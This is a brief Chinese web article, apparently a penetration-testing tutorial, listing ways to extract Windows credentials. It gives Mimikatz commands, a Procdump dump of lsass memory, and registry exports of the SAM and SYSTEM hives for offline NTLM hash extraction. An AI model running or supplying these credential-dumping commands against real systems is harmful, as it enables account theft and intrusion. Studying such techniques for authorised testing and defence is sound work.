内网渗透—获取Windows内Hash密码方法总结
1、直接读取
Mimikatz读取明文密码和hash时需要管理员权限。
privilege::debug //提升至debug权限
sekurlsa::logonpasswords //抓取密码
2、Procdump+Mimikatz离线读取lsass.dmp文件
Procdump是微软官方发布的工具,可以用来将目标lsass文件导出。先在目标机器上上传Procdump,导出lsass.dmp
procdump64.exe-accepteula-ma
lsass.exe lsass.dmp
将目标机上的lsass.dmp下载到本地后,执行Mimikatz导出lsass.dmp里面的密码和hash:
sekurlsa::minidump 目录lsass.dmp //将导出的lsass.dmp载入到Mimikatz中
sekurlsa::logonpasswords full //获取密码
3、通过SAM和System文件抓取密码和Hash
首先利用注册表命令将目标机的sam或者system文件导出
reg save hklmsam sam.hive
reg save hklmsystem system.hive
然后将目标机上的sam.hive和system.hive下载到本地,利用Mimikatz读取sam和system文件获取NTLMHash:
token::elevate
lsadump::sam
图片新闻
最新活动更多
-
4月30日限时免费下载>> 高动态范围(eHDR)成像设计指南
-
6月18日立即报名>> 【线下会议】OFweek 2024(第九届)物联网产业大会
-
8月27-29日马上报名>>> 2024(第五届)全球数字经济产业大会暨展览会
-
精彩回顾立即查看>> 2024激光行业应用创新发展蓝皮书火热招编中!
-
精彩回顾立即查看>> 《2023云计算与通信5G类优秀产品&解决方案合集》
-
精彩回顾立即查看>> OFweek2023中国优.智算力年度评选
发表评论
请输入评论内容...
请输入评论/评论长度6~500个字
暂无评论
暂无评论